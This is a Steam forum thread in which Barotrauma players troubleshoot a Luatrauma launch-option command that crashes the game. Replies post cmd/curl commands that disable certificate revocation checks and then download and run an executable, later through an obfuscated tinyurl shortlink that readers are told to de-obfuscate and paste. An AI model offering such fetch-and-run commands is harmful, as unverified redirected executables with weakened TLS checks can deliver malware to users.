Barotrauma

Barotrauma

Lua For Barotrauma
Wistful_Muse 15 Dec, 2024 @ 12:42pm
Help with Lua (not being able to launch the game)
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
< >
Showing 1-15 of 15 comments
I'm having the exact same issue
Miriouki 9 Jan @ 11:23am 
Same issue here too
well,same issue,I found a strong lag in the submarine editor.Every time an item is placed, there will be a lag of about 1 second.
Leonidas 17 Jan @ 12:18pm 
I believe it's an issue with firewalls? Perhaps some antivirus
The main issue can be the usage of an antivirus, disabling it would probably make it run fine.
Fly_Cloud 24 Jan @ 11:35pm 
oh,I found the solution,I made an incorrect configuration in PF.I reinstalled PF and applied the default configuration.:happy_seagull:
Marmot 11 Apr @ 7:39pm 
I've got a similar issue, I copied and pasted the entire windows install command since that's the OS I use but when I try opening the game I get a brief command console window that closes almost immediately and the game doesn't open at all
VanishGuy 28 Apr @ 2:39pm 
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)
VanishGuy, you are a sainte
Mephyst 5 May @ 3:19pm 
had the same problem, VanishGuy's solution above fixed it
Originally posted by Wistful_Muse:
Hi!

I recently subscribed to Lua via the Steam Workshop for the first time, and have followed all instructions on the workshop page.

I had went onto the properties page, placed the code for Windows into the launch options box and when I try to launch the game, it runs for a few seconds, a command console pops up and then the game stops running. I cannot get into the game. I have done all the troubleshooting options from the Workshop page and none of them have seemed to help.

When I remove the code from the launch options, it seems to work fine, but I'm not sure what I'm doing wrong here. Any insight would be appreciated, thank you! :)
UPDATED SOLUTION
I reached the character limit for the startup parameter command, had to shorten link

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Originally posted by VanishGuy:
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem
Originally posted by Vainglorious:
Originally posted by VanishGuy:
!!!SOLUTION!!!
The problem occurs when the system cannot check the revocation status of the certificate because the revocation server (CRL) is unavailable. To solve the problem, you need to finalize the command.
cmd /c "curl --ssl-no-revoke -L -o Luatrauma.AutoUpdater.win-x64.exe https://github.com/Luatrauma/Luatrauma.AutoUpdater/releases/download/latest/Luatrauma.AutoUpdater.win-x64.exe && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
(--ssl-no-revoke disables certificate revocation checking)

i pasted this to my lunch options still same problem

Try this one.
cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"
Alex 5 Jul @ 1:45pm 
The game doesnt start with after add text at windows
Originally posted by Alex:
The game doesnt start with after add text at windows
From your answer, as I understand, you inserted this command into the Windows console line, but this is not what is needed

You need to add the following text
1) rmb (on barotrauma)
2)properties
3)paste this text in launch properties:

cmd /c "curl --ssl-no-revoke --retry 10 --retry-delay 10 --http1.1 -L -C - -o Luatrauma.AutoUpdater.win-x64.exe https://DELETE_THIStinyurl.DELETE_THIScom/mtbhfhp3 && start /b Luatrauma.AutoUpdater.win-x64.exe %COMMAND%"

DO NOT FORGET TO DELETE "DELETE_THIS" FROM COMMAND
< >
Showing 1-15 of 15 comments
Per page: 1530 50